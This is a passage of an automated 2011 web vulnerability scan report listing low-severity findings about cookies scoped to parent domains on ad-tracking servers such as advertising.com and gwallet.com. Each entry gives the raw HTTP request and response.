Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 04 Sep 2011 04:18:15 GMT
Connection: close
Set-Cookie: C2=HwvYO9aFHYIiGt7sQdwSka0uSKMCdbdxlJoII0bSFAH; domain=advertising.com; expires=Tue, 03-Sep-2013 04:18:15 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

15.127. http://r1-ads.ace.advertising.com/ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=drsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994513.804611.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 02:27:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 02:27:19 GMT
Content-Length: 1535
Connection: close
Set-Cookie: C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: F1=Bcg4i5EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: BASE=oTwUgn8fYrESn1B!; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: ROLL=XpwfYsHr/Y/PQCL!; domain=advertising.com; expires=Tue, 03-Sep-2013 02:27:19 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click

document.write('<HTML>');document.write('<HEAD>');document.write('<TITLE>&nbsp;</TITLE>');document.write('</HEAD>');document.write('<BODY>');document.write('<OBJECT classid=\'clsid:D27CDB6E-AE6D-11cf-
...[SNIP]...

15.128. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms?01AD=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg&01RI=9A4FEFFF11C0CF6&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; A07L=CT-1; ACID=Rq690013151032380008; ASCID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bcg4i5EBAAAABAAAAEAAgEA; BASE=oTwUgn8fYrESn1B!; ROLL=XpwfYsHr/Y/PQCL!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924216.800700.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:04:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:04:39 GMT
Connection: close
Set-Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; expires=Sun, 02-Oct-2011 03:04:39 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bgs6i5EBAAAABAAAAQIASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: BASE=oTwU6n8fYrESn1x8Qj3fRMy2B+vjVEHntdO7zpq9oQmkUQOfNzVeo/Q5dYCetd+R/VlITpQfPOUsbbj+pnMLNfBe9fnQLuLn9xikW3Jh5OoVuUMh/BIsMV8iPy2BtcWfXIfMiw7+OMKalrgWYeeNQFCpfXb1VEv0cHsxuTJBgslffdkG7KRfwyvkPxeMWLYNGk8b1YA5ZAxZ13KVsZVXrXYYjnmkAAK!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: ROLL=XpwfCsHr/Y/PQCLUeRRTtt2oYGcdkyfKC9wh3xK/PCaAn1iIwv0zeaXV4OrEbOoMlyB7+9MpX6VwzAST0/+akVnT3g4UEMP57hFdkrM6/aUrBbArbW/6ycoQ622FNcK6vnsyTNNOrLANP7s7ffSv/iN2X7QQFvxkaY0/ZGTQjjSjcY3TDpzci4TsvbMO4QGQ7ofB9wJJg67LD1PYDy0Q8zYz/O8Z6ZN!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:04:39 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click
Set-Cookie: 0866435731=_4e62ea87,0866435731,0^0^0^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7114534657=_4e62ea86,7114534657,0^0^0^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=00008007
...[SNIP]...

15.129. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=drsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.949949.804621.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:03:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:03:34 GMT
Content-Length: 1099
Connection: close
Set-Cookie: C2=GquYO9aFHYIiG97sQdwSka0vSKMCdbdxpxK4IEscG6GtnggnraobCKCC9mUxvhaOBcxWGsG; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: F1=BYo6i5EBAAAABAAAAMAASEA; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: BASE=oTwUin8fYrESn1x8Qj3fRMy2B+vjVEH!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: ROLL=XpwfasHr/Y/PQCLUeRRTtt2oYGcdkyP!; domain=advertising.com; expires=Tue, 03-Sep-2013 03:03:34 GMT; path=/
Set-Cookie: 36466465=_4e62e207,0637251025,804611^994513^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 88962478=_4e62e208,7215437176,800700^999589^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7215437176=_4e62e208,7215437176,800700^999589^1183^0,1_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710721/direct;wi.300;hi.250/01/4105058118?click=http://r1-ads.ace.advertising.com/click/site=0000804621/mnum=0000949949/cstr=36466465=_4
...[SNIP]...

15.130. http://rp.gwallet.com/r1/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/optout?optout&nocache=0.5617585 HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_sid=22

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rp.gwallet.com/r1/optout?check&rand=1315135032927
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 03-Sep-2012 11:17:12 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=g5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=15; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 04-Sep-2016 11:17:12 GMT; Path=/; Domain=gwallet.com; Version=1


15.131. http://rs.gwallet.com/r1/pixel/x420r5261063  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5261063

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5261063 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Mon, 03-Sep-2012 02:42:38 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Mon, 03-Sep-2012 02:42:38 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

15.132. http://rs.gwallet.com/r1/pixel/x420r9614074  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r9614074

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r9614074 HTTP/1.1
Host: rs.gwallet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ra1_uid=4639578929876828096; ra1_sid=22; BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4639578929876828096; Expires=Mon, 03-Sep-2012 03:55:25 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Mon, 03-Sep-2012 03:55:25 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

15.133. http://s.amazon-cornerstone.com/iu3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.amazon-cornerstone.com
Path:   /iu3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iu3?d=assoc-amazon.com&rP=http%3A%2F%2Fwww.nationmultimedia.com%2Fhome%2Fbanner%2Findex_bottom.php&cB=8433638485148549 HTTP/1.1
Host: s.amazon-cornerstone.com
Proxy-Connection: keep-alive
Referer: http://rcm.amazon.com/e/cm?t=nationmultime-20&o=1&p=48&l=st1&mode=books&search=novel%20best%20selling&fc1=000000&lt1=&lc1=3366FF&bg1=FFFFFF&f=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad-privacy=0; ad-id=Ayy0HVI91kopvWsXdVMP4Ng

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:14 GMT
Server: Server
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Type: text/html;charset=ISO-8859-1
Cneonction: close
Set-Cookie: ad-id=Ayy0HVI91kopvWsXdVMP4Ng; Domain=amazon-cornerstone.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 65

<html><body style="background-color:transparent">
</body></html>

15.134. http://s.xp1.ru4.com/coop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /coop

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /coop?action_id=4&version=old&nocache=0.7580675 HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=BO-00000000670935830

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 10:59:27 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Set-cookie: X1ID=OO-00000000000000000; domain=.ru4.com; path=/; expires=Sun, 04-Sep-2041 06:59:27 GMT
Location: http://s.xp1.ru4.com/coop?action_id=4&version=old&test_flag=1
Content-length: 0
X-Cnection: close


15.135. http://search.spotxchange.com/partner  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /partner

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner?adv_id=6498&uid=17200647&img=IMG HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDMyNjMK

Response

HTTP/1.1 204 No Content
Date: Sun, 04 Sep 2011 03:21:42 GMT
Server: Apache
Content-Location: partner.html
Vary: negotiate
TCN: choice
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtgbqwSOhhbMmn%2BqGttu%2BUgmGV2CGR7%2BsRz1%2B%2FwEXzYr7ITwZuWNTy%2FcMtoZuQY4f2N0DMEvpyMLpNuUEEjFa0uH7Y4J6blOxfHCTz3gAQRMid8UNgVr2B08%2BlS7CF9zi5CJWtU0esk%2BuXc%2Fjvvt3p5gI5eSBcEzdOKutmS4%2FoHJhU1KQ%3D%3D; expires=Mon, 02-Jan-2012 03:21:42 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 03:21:42 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html


15.136. http://srv.clickfuse.com/pixels/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /pixels/create.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/create.php?name=criteo&expire=30 HTTP/1.1
Host: srv.clickfuse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: criteo=tagged

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 04 Sep 2011 03:59:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=tagged; expires=Tue, 04-Oct-2011 03:59:21 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D..

15.137. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=5&redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315103145

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 02:28:10 GMT
Location: http://r.openx.net/set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&rtb=uuid%3D4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315103290; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 02:28:10 GMT
Content-Length: 0


15.138. http://t.mookie1.com/t/v1/event  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=2451&migAction=ibehavior_tidal&migSource=mig&migDest=http%3A%2F%2Fuav.tidaltv.com%2F3PDPHandler.aspx%3Ftpdp%3D25%26app%3D3%26segs%3D&vid=0 HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
